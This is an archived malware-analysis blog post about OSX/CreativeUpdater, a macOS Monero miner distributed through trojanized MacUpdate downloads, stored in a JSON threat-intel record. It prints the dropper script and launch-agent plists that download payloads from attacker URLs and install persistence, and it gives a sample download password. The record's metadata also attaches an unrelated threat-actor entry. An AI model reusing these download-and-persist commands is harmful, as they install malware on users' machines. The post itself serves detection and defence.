{
	"id": "7964c0e6-05d3-4fea-b944-90480f5b243c",
	"created_at": "2026-04-06T00:07:56.670641Z",
	"updated_at": "2026-04-10T13:11:37.140317Z",
	"deleted_at": null,
	"sha1_hash": "e237916003d26326569197209fca26ed7fb907b2",
	"title": "Analyzing OSX/CreativeUpdater",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1256061,
	"plain_text": "Analyzing OSX/CreativeUpdater\r\nArchived: 2026-04-05 14:47:41 UTC\r\n› a macOS cryptominer, distributed via macupdate.com\r\n02/05/2018\r\nlove these blog posts? support my tools \u0026 writing on patreon :)\r\nWant to play along? I've shared the malware, which can be downloaded here (password: infect3d).\r\nBackground\r\nWe're barely into 2018, and already there is another Mac trojan going around. Targeting macOS users, the malware was distributed via infected applications linked to on the popular MacUpdate website. Specifically, on February 1st, the MacUpdate editor 'Jess-MacUpdate' added comments on several popular applications such as FireFox:\r\nYikes! 😱\r\nIn this short blog post we'll dive into the malware, briefly discussing its persistence mechanisms and capabilities.\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 1 of 15\r\nBefore diving in, I want to thank the following security researchers and friends:\r\n@noarfromspace\r\nwho brought the malware to my attention, provided links and insightful comments about the malware, and AFAIK gets credit for the name OSX/CreativeUpdater!\r\n@thomasreed\r\nwho also wrote a comprehensive blog post about this malware: \"New Mac cryptominer distributed via a MacUpdate hack\". It's definitely a worthwhile read!\r\n@marc_etienne_\r\nwho provided valuable insight into both the discovery and analysis of the malware.\r\nOSX/CreativeUpdater\r\nSo, a user is happily browsing MacUpdate, ends up at their listing for Firefox (or OnyX or Deeper)...and decides to download it. As noted by Thomas Reed, the download link on the MacUpdate site had been modified to point to a hacker-controlled URL which served up the malware:\r\n\"The fake Firefox app was distributed from download-installer.cdn-mozilla.net. (Notice the domain ends in cdn-mozilla.net, which is definitely not the same as mozilla.net. This is a common scammer trick to make you think it’s coming from a legitimate site.)\"\r\nThus, instead of the legitimate Firefox application, a trojanized version would be served up to the user in the form of a signed disk image (Apple Developer ID: Ramos Jaxson):\r\nWe can mount this disk image by double-clicking it, or via the 'hdiutil' utility:\r\n $ hdiutil attach -noverify ~/Downloads/Firefox\\ 58.0.2.dmg\r\n /dev/disk3s2 Apple_HFS /Volumes/Firefox\r\nThe application shown in the disk image, Firefox.app, is also signed with the same developer ID. The fact that both the disk image and the application are signed means that Gatekeeper (in its default settings) won't block the malware from executing.\r\nLooking at the contents of the trojanized Firefox application bundle shows the main binary ('MozillaFirefox'), plus reveals another Firefox application as well as a script (aptly named 'script') in the Resources directory:\r\nIt's easy to confirm the validity of this second Firefox application by checking its digital signature (and ensuring it's signed by Mozilla). The WhatsYourSign Finder extension will display this signing information via the UI:\r\nAs we'll shortly see, the malware will execute the legitimate Firefox application so that the user won't suspect anything malicious has occurred!\r\nDecompiling the main executable, 'MozillaFirefox', we can see it looking for the 'script' file:\r\n void -[ScriptExecController loadAppSettings](void * self, void * _cmd) {\r\n r13 = [[var_1B0 pathForResource:@\"script\" ofType:0x0] retain];\r\n r15 = @selector(defaultManager);\r\n r12 = [_objc_msgSend_100015138(@class(NSFileManager), r15) retain];\r\n rbx = [[var_1B0 pathForResource:@\"script\" ofType:0x0] retain];\r\n r14 = [r12 fileExistsAtPath:rbx];\r\n if (r14 == 0x0) {\r\n [Alerts fatalAlert:@\"Corrupt app bundle\"\r\n subText:@\"Script missing from application bundle.\"];\r\n }\r\n ...\r\n }\r\nIt then executes it, via a call to the '-[ScriptExecController executeScript]' method:\r\n void -[ScriptExecController executeScript](void * self, void * _cmd) {\r\n rbx = self;\r\n [rbx prepareForExecution];\r\n [rbx prepareInterfaceForExecution];\r\n *(int8_t *)(rbx + r14) = 0x1;\r\n if (*(int32_t *)\u0026rbx-\u003eexecStyle == 0x1) {\r\n rsi = @selector(executeScriptWithPrivileges);\r\n }\r\n else {\r\n rsi = @selector(executeScriptWithoutPrivileges);\r\n }\r\n (*_objc_msgSend)(rbx, rsi);\r\n return;\r\n }\r\n void -[ScriptExecController executeScriptWithoutPrivileges](void * self, void * _cmd) {\r\n r13-\u003etask = [[NSTask alloc] init];\r\n [r13-\u003etask setLaunchPath:r13-\u003einterpreterPath];\r\n [r13-\u003etask setArguments:r13-\u003earguments];\r\n [r13-\u003etask launch];\r\n ...\r\n }\r\nAs noted by @noarfromspace on Twitter, OSX/CreativeUpdater was created using a legitimate developer tool called Platypus. According to its website:\r\n\"Platypus is a Mac OS X developer tool that creates native Mac applications from interpreted scripts such as shell scripts or Perl, Ruby and Python programs. This is done by wrapping the script in an application bundle along with a native executable binary that runs the script.\"\r\nThis explains why the main application (i.e. the trojanized Firefox.app) simply executes the 'script' file when run.\r\nHrmm, where have we seen Platypus used before!? In OSX/Eleanor:\r\nAnd as I noted on twitter, OSX/Eleanor also used MacUpdate to spread:\r\nIntriguing! Are they related? Who knows...\r\nMoving on, let's peek at the script that's executed when the malicious application is started:\r\n $ cat Firefox.app/Contents/Resources/script\r\n open Firefox.app\r\n if [ -f ~/Library/mdworker/mdworker ]; then\r\n killall MozillaFirefox\r\n else\r\n nohup curl -o ~/Library/mdworker.zip https://public.adobecc.com/files/1U14RSV3MVAHBMEGVS4LZ42AFNYEFF?content_disposition=attachment\r\n \u0026\u0026 unzip -o ~/Library/mdworker.zip -d ~/Library\r\n \u0026\u0026 mkdir -p ~/Library/LaunchAgents\r\n \u0026\u0026 mv ~/Library/mdworker/MacOSupdate.plist ~/Library/LaunchAgents\r\n \u0026\u0026 sleep 300\r\n \u0026\u0026 launchctl load -w ~/Library/LaunchAgents/MacOSupdate.plist\r\n \u0026\u0026 rm -rf ~/Library/mdworker.zip\r\n \u0026\u0026 killall MozillaFirefox \u0026\r\nAs Thomas Reed notes:\r\n\"...this code first attempts to open the decoy application. Next, if the malware is already installed, the malicious dropper process is killed, since installation is not necessary.\r\nIf the malware is not installed, it will download the malware and unzip it into the user’s Library folder...It also installs a malicious launch agent file named MacOSupdate.plist, which recurrently runs another script.\"\r\nIn other words, it simply downloads and installs a persistent payload. What could this be?\r\nThough the zip file the malware tries to download (mdworker.zip, from https://public.adobecc.com/files/1U14RSV3MVAHBMEGVS4LZ42AFNYEFF) is no longer available, luckily we can grab it from VirusTotal.\r\nFirst, let's look at the 'MacOSupdate.plist' file:\r\n \u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n \u003c!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" ...\u003e\r\n \u003cplist version=\"1.0\"\u003e\r\n \u003cdict\u003e\r\n \u003ckey\u003eLabel\u003c/key\u003e\r\n \u003cstring\u003eMacOSupdate\u003c/string\u003e\r\n \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n \u003carray\u003e\r\n \u003cstring\u003esh\u003c/string\u003e\r\n \u003cstring\u003e-c\u003c/string\u003e\r\n \u003cstring\u003elaunchctl unload -w ~/Library/LaunchAgents/MacOS.plist \u0026\u0026 rm -rf ~/Library/LaunchAgents/MacOS.plist \u0026\u0026 curl -o ~/Library/LaunchAgents/MacOS.plist https://public.adobecc.com/files/1UJET2WD0VPD5SD0CRLX0EH2UIEEFF?content_disposition=attachment \u0026\u0026 launchctl load -w ~/Library/LaunchAgents/MacOS.plist \u0026\u0026 ~/Library/mdworker/mdworker\u003c/string\u003e\r\n \u003c/array\u003e\r\n \u003ckey\u003eRunAtLoad\u003c/key\u003e\r\n ...\r\nOk, kinda stupid - just downloads and installs another (new?) version of MacOS.plist.\r\nLooking at these 'secondary' instances of the plist, one can see they persistently execute something named 'mdworker' out of the ~/Library/mdworker/ directory:\r\n //version 1\r\n $ cat ~/Library/LaunchAgents/MacOS.plist\r\n ...\r\n \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n \u003carray\u003e\r\n \u003cstring\u003esh\u003c/string\u003e\r\n \u003cstring\u003e-c\u003c/string\u003e\r\n \u003cstring\u003e~/Library/mdworker/mdworker -user sarahmayergo1990@gmail.com -xmr -proxy socks://104.236.13.101:1080\u003c/string\u003e\r\n \u003c/array\u003e\r\n ...\r\n //version 2\r\n $ cat ~/Library/LaunchAgents/MacOS.plist\r\n ...\r\n \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n \u003carray\u003e\r\n \u003cstring\u003esh\u003c/string\u003e\r\n \u003cstring\u003e-c\u003c/string\u003e\r\n \u003cstring\u003e~/Library/mdworker/mdworker -user walker18@protonmail.ch -xmr\u003c/string\u003e\r\n \u003c/array\u003e\r\n ...\r\nRunning the mdworker binary (in a virtual machine) reveals it's simply MinerGate's command-line cryptominer, minergate-cli:\r\n $ ./mdworker -help\r\n Usage:\r\n minergate-cli [-version] -user \u003cemail\u003e [-proxy \u003curl\u003e]\r\n -\u003ccurrency\u003e \u003cthreads\u003e [\u003cgpu intensity\u003e]\r\n [-\u003ccurrency\u003e \u003cthreads\u003e [\u003cgpu intensity\u003e] ...]\r\n [-o \u003cpool\u003e -u \u003clogin\u003e [-t \u003cthreads\u003e]\r\n [-i \u003cgpu intensity\u003e]]\r\nThis utility is freely available for download from: minergate.com/downloads/console.\r\nSince the miner is invoked with the -xmr flag, infected computers will mine Monero. And what about those email addresses? Thomas notes the mining software will, \"periodically connect to minergate.com, passing in the email address as the login\".\r\nSo now we fully understand the goal of the malware: mine crypto-currencies. Really nothing too exciting - but a trend we're seeing more and more on macOS!\r\nAnd if you're wondering who did it? Well, there may be some hints buried within the disk image files. If we look closely (as noted by @noarfromspace), there's a .DS_Store file in the root directory of the dmg!\r\n $ ls -lart /Volumes/Firefox/ | grep .DS_Store\r\n -rw-r--r--@ 1 user staff 10244 Jan 31 11:18 .DS_Store\r\nAs explained by Wikipedia, the \".DS_Store is a file that stores custom attributes of its containing folder, such as the position of icons or the choice of a background image.\" However, .DS_Store files also may contain paths....such as the original (full) path of the .dmg on the attacker's machine 🙈.\r\nLet's run strings on each of the .DS_Store files:\r\n $ strings -a .DS_Store | grep tiago\r\n tiagobrandaomateus\r\n /Users/tiagobrandaomateus/teste/macupdate/Firefox_temp.dmg\r\n $ strings -a /Volumes/OnyX\\ 3.4.2/.DS_Store | grep -i tiago\r\n tiagobrandaomateus\r\n /Users/tiagobrandaomateus/teste/macupdate/OnyX 3.4.2_temp.dmg\r\n $ strings -a /Volumes/Deeper\\ 2.2.7/.DS_Store | grep -i tiago\r\n tiagobrandaomateus\r\n /Users/tiagobrandaomateus/macupdate/deeper-app/Deeper 2.2.7_temp.dmg\r\nInteresting, I wonder who Tiago Brandão Mateus is!?\r\nConclusions\r\nIn this blog post we provided a technical analysis of the newly discovered macOS cryptominer OSX/CreativeUpdater. Though not particularly sophisticated nor insidious, by utilizing MacUpdate as its infection vector it had the potential to infect a large number of users.\r\nLet's end with a few FAQs!\r\nQ: How does one get infected by OSX/CreativeUpdater?\r\nA: By downloading an infected application from MacUpdate. Specifically one of the following applications:\r\n\"Firefox 58.0.2 since 1 February 2018\"\r\n\"Onyx since 1 February 2018\" (likely version 3.4.2)\r\n\"Deeper since 1 February 2018\" (likely version 2.2.7)\r\nQ: Can I still get infected?\r\nA: Unlikely. MacUpdate notes that they \"have removed the [malicious] link[s]\". Moreover, Apple has revoked the certificate used to sign the malicious disk images and application:\r\nOnce the certificate has been revoked, the disk images won't mount nor will the applications run (via the UI):\r\nQ: How can I tell if I'm infected with OSX/CreativeUpdater?\r\nA: First check to see if there is a process named mdworker or sysmdworker running from ~/Library/mdworker/:\r\n$ ps aux | grep [/]Library/mdworker/\r\nuser 2199 /Users/user/Library/mdworker/mdworker\r\nOne can also look for the persistent artifacts of the malware. This includes the following files \u0026 directories:\r\n~/Library/mdworker/\r\n~/Library/LaunchAgents/MacOSupdate.plist\r\nThe KnockKnock tool will also display the launch agent plist (~/Library/mdworker/MacOSupdate.plist):\r\nQ: On an infected system, what can OSX/CreativeUpdater do?\r\nA: OSX/CreativeUpdater is designed to simply mine Monero (XMR) cryptocoins. While this will likely use a large percentage of your CPU, that's about all the side-effects. It should be noted that as the malware does (did?) have the ability to update itself, the attacker could have provided a customized payload. However at this time, there is no indication that this happened.\r\nQ: Your tools will protect against this, right?\r\nA: Of course!\r\nFor example, BlockBlock will detect the persistence (when the malware downloads \u0026 creates the launch agent plist via curl):\r\nLuLu will also display an alert when the malware connects out (again via curl) to download various components:\r\nWell that wraps up our blog on OSX/CreativeUpdater! Mahalo for reading :)\r\nlove these blog posts \u0026 tools? you can support them via patreon! Mahalo :)\r\nSource: https://objective-see.com/blog/blog_0x29.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://objective-see.com/blog/blog_0x29.html"
	],
	"report_names": [
		"blog_0x29.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434076,
	"ts_updated_at": 1775826697,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e237916003d26326569197209fca26ed7fb907b2.pdf",
		"text": "https://archive.orkl.eu/e237916003d26326569197209fca26ed7fb907b2.txt",
		"img": "https://archive.orkl.eu/e237916003d26326569197209fca26ed7fb907b2.jpg"
	}
}